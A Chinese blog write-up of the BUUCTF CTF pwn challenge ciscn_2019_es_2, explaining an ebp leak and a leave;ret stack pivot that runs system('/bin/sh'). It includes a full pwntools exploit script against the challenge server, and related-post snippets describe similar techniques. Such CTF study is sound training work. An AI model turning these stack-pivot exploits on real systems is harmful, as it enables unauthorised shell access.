[BUUCTF]PWN——ciscn_2019_es_2

最新推荐文章于 2022-05-20 22:01:49 发布
最新推荐文章于 2022-05-20 22:01:49 发布
阅读量2.2k 收藏 9
点赞数 9
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/109318321
版权

ciscn_2019_es_2

附件

步骤:

  1. 例行检查,32位程序,开启了nx保护
    在这里插入图片描述

  2. 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用
    在这里插入图片描述
    system_addr=0x80048400
    在这里插入图片描述

  3. main函数
    在这里插入图片描述

  4. 程序主体在vul函数里
    在这里插入图片描述
    读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入2次数据,我们可以通过第一次输入来泄露程序里的ebp地址,知道了ebp的地址就能够推算出参数s在栈上的地址,第二次直接往栈上写入system(‘/bin/sh’),之后利用leave;ret的栈劫持去到参数s的栈,让它去执行我们布置在栈上的system(‘/bin/sh’)来获取shell

利用过程:
一、泄露ebp
printf函数在输出的时候遇到’\0‘会停止,如果我们将参数s全部填满,这样就没法在末尾补上’\0‘,那样就会将ebp连带着输出

payload='a'*0x27+'b'
r.sendline(payload)
r.recvuntil('b')
ebp=u32(r.recv(4))

二、找到参数s在栈上的位置
首先下个断点,来调试一下我们的ebp距离参数s的位置,在main函数的nop处下断点
在这里插入图片描述

在这里插入图片描述
’bbbb‘ 是我输入的参数,可以看到ebp距离我们输入的参数的距离是0x38
在这里插入图片描述
ebp-0x38就拿到了我们参数s在栈上的位置

三、布置s栈上的值
由于我们要用到leave;ret来劫持栈,所以先找一下leva;ret的位置
在这里插入图片描述
构造

payload='aaaa'+p32(sys)+p32(main)+p32(s+0x10)+"/bin/sh"

第一个’aaaa‘随便输入,如果一开始将system函数写第一个,那么我们在用leave;ret劫持栈的时候要抬高4字节
接着跟上system函数的地址
后面是执行完system函数后的返回地址,这边也可以随便写
之后是一个地址,这个地址指向的是我们写在栈上的’/bin/sh‘字符串

将参数0x28长的s补齐

payload2=payload2.ljust(0x28,'\x00'

四、栈劫持,获取shell

payload2+=p32(s)+p32(leave_ret)

完整exp

from pwn import *

r=remote('node3.buuoj.cn',28967)

sys=0x8048400
leave_ret=0x08048562
main=0xdeadbeef

payload='a'*0x27+'b'
r.send(payload)
r.recvuntil("b")
s=ebp=u32(r.recv(4))-0x38

payload2='aaaa'+p32(sys)+p32(main)+p32(s+0x10)+"/bin/sh"
payload2=payload2.ljust(0x28,'\x00')
payload2+=p32(s)+p32(leave_ret)


r.send(payload2)
r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ciscn_2019_es_2
NANMUZN的博客
04-14 97
首先栈迁移的关键是知道ebp的地址,由于有read函数还有printf函数,如果我们将ebp之前的地址全覆盖并且不加"\x00"的话,就可以将ebp的地址打印出来,这样就可以得到ebp的地址了。可以看到有read,而且有两次,但是s距离ebp的距离是0x28,虽然可以溢出0x30,但是也只可以多溢出ebp和ret。栈的构造大概是这样将ret的地址中填入leave_ret的地址将其返回到AAAA,接着ret到system,接着执行。所以看了大佬的博客,看到了之前没有见过的攻击手法。第一步:checksec。
pwn刷题num43---栈迁移
tbsqigongzi的博客
05-03 649
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1006
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
字符串编码解决python3 payload=‘a‘ +p64(1926)报错问题
yongbaoii的博客
09-29 6909
基于一些PWN题实战发现的问题 先对题目进行简述,简单的栈溢出,要求在填充八个字节以后用int类型1926对后面四个字节进行覆盖 先上代码以及报错信息 from pwn import* r = remote("220.249.52.133",47338) payload='aaaaaaaa' payload += p64(1926) r.recvuntil("What's Your Birth?\n") r.sendline("2000") r.recvuntil("What's Your Name?\n"
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
ciscn_2019_es_2(栈迁移)
qq_51687381的博客
08-27 245
代码不复杂,就是两个read和两个print 关键在于这个read的大小和v1的位置。 0x28的和0x30的大小,让我们直接rop的话只能溢出到ret的位置,而不能控制ret函数的参数。 这里就需要用到栈迁移,就把栈的位置往上提,让我们可以控制到ret和ret的参数。 既然我们想让栈往上提,那么就必须知道栈的具体位置,而我们知道,对于一个函数的栈帧中,有地址的位置就是ebp的位置,所以我们可以泄露出ebp的位置进而得到栈的位置。 from pwn import * a=proces...
ciscn_2019_es_2的wp
wuyvle的博客
02-16 2065
32位,看看函数主体 read函数0x30只能刚好覆盖ebp和ret。所以我们要用到栈迁移 栈迁移核心思想就是利用leave和ret转移ebp和esp。leave和ret常用于复原栈 leave=mov esp,ebp pop ebp ret=pop eip 首先我们泄露ebp的地址 查看栈区 偏移地址 0x118-0xe=0x38 esp指向了我们写入的system,接下来的ret就会使eip指向system函数。 ebp-0x38指向aaaa的地址。aaaa实际就是leave_ret后的ebp指向
ciscn_2019_es_2——wp
xuaohu123的博客
12-23 831
buuctf ciscn_2019_es_2
[Black Watch 入群题]PWN 栈劫持的利用
半岛铁盒的博客
08-17 326
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输入的参数s,那边我们可以写入很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输入,利用站劫持,把程序的执行流程劫持到第一次输入的位置就可以了 站劫持利用 做栈劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
PwnBUUCTF ciscn_2019_s_4 wp 栈迁移
Lcw_linyx的博客
05-20 499
个人日记= =,记录pwn自己的自闭过程
CTF中的一些常见骚操作(可以没有,但不能不会)
kali_Ma的博客
07-19 2012
0X01:前言 近期刷了挺多的ctf题,总结了一些ctf中常见的骚姿势。 0X02:来啦来啦,骚姿势总结 一. 弱类型比较 ctf中见怪不怪了,经常已经知道题目要考察的是什么知识了,传参都要用个弱类型比较来为难一下我们。 ‘=’,‘’,‘=’ 一个等于是赋值,两个等于是将两个变量转相同的类型再比较,三个等于先比较变量类型是否相同再比较值。 非相同类型比较 如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行 先看几组比较结果: 当我们用字.
调整栈帧技巧 | 劫持栈指针
Sakura给爷pwn全场
12-12 183
参考链接 https://www.cnblogs.com/ichunqiu/p/11238429.html
ciscn_2019_n_5
、moddemod
06-17 302
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
PWN-无libc泄露
zszcr的博客
03-22 3675
pwn题的无libc泄露用到的pwntools的DynELF模块实现条件是:有指向libc空间的 能泄露libc空间信息的函数 (write和puts函数)能重复触发漏洞DynELF模块的基本框架:p=process('./xxx')def leak(address):    payload='xxx'+address+'xxx'  #address就是你要泄露的地址 ,payload是你控制程序...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值